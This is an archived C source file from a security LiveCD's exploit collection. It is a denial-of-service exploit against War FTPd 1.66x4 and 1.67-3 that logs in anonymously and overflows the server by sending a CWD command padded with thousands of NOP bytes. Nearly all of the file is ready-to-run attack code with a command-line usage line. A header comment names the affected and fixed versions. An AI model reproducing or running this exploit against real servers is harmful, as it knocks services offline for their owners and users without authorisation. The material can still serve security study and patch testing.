home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / warftpd / warftpd.c < prev   
C/C++ Source or Header  |  2005-02-12  |  2KB  |  95 lines
  1. /* coded by eth0 from buffer0verfl0w */
  2. /* tested by morpha */
  3. /* *NOTE* Original exploit was coded for winbl0wz *NOTE */
  4. /*
  5.   Vulnerable:
  6.     War FTPd version 1.66x4 
  7.     War FTPd version 1.67-3
  8.  
  9.   Immune:
  10.     War FTPd version 1.67-4
  11.     War FTPd version 1.71-0
  12.  
  13.   The buffer overflow seems to occur because the bound
  14.   check of the command of MKD/CWD is imperfect. This
  15.   means that although anyone can overflow the statically
  16.   assigned buffer that stores the requested path, you
  17.   cannot overwrite the RET address and therefore it's
  18.   impossible to cause War FTPd to execute arbitrary code.
  19.   However, it is a simple mechanism for performing a Denial
  20.   of-Service against the server.
  21.  
  22. Solution:
  23.  War FTPd 1.70-1 does fix this problem, but it contains other
  24.  vulnerabilities (see our additional information section).
  25. */
  26.  
  27. #include <stdio.h>
  28. #include <strings.h>
  29. #include <errno.h>
  30. #include <signal.h>
  31. #include <sys/syscall.h>
  32. #include <sys/types.h>
  33. #include <sys/socket.h>
  34. #include <netinet/in.h>
  35. #include <netdb.h>
  36.  
  37. #define FTP_PORT 21
  38. #define MAXBUF 8182
  39. //#define MAXBUF 553
  40. #define MAXPACKETBUF 32000
  41. #define NOP 0x90
  42. #define PASS "PASS eth0@owns.your.ass.com\r\n"
  43. #define LOGIN "USER anonymous\r\n"
  44.  
  45. int expl0it(char *host)
  46. {
  47.   struct hostent *hp;
  48.   struct in_addr addr;
  49.   struct sockaddr_in s;
  50.   static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
  51.   /* u_char buf[280]; */
  52.   int p, i;
  53.  
  54.   hp = gethostbyname (host);
  55.   if (!hp) exit (1);
  56.  
  57.   bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
  58.   p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
  59.   s.sin_port = htons (FTP_PORT);
  60.   s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
  61.  
  62.   if(connect (p, &s, sizeof (s))!=0)
  63.     {
  64.       printf("[%s:%s] <-- doesn't seem to be listening\n",host,FTP_PORT);
  65.       return;
  66.     }
  67.   else
  68.     {
  69.       printf("Connected!\n");
  70.       write(p, LOGIN, strlen(LOGIN));
  71.       write(p, PASS, strlen(PASS));
  72.  
  73.       memset(buf,NOP,MAXBUF);
  74.       buf[MAXBUF-1]=0;
  75.       sprintf((char *)packetbuf,"CWD %s\r\n",buf);
  76.       send(p,(char *)packetbuf,strlen((char *)packetbuf),0);
  77.       printf("DONE!\n");
  78.     }
  79.   return(0);
  80. }
  81.  
  82. int main(int argc, char *argv[])
  83. {
  84.   if(argc<2)
  85.     {
  86.       printf("Usage: %s [host] \n",argv[0]);
  87.       return;
  88.     }
  89.   else
  90.     {
  91.       expl0it(argv[1]);
  92.     }
  93.   return(0);
  94. }
  95. /*                    www.hack.co.za           [10 May 2000]*/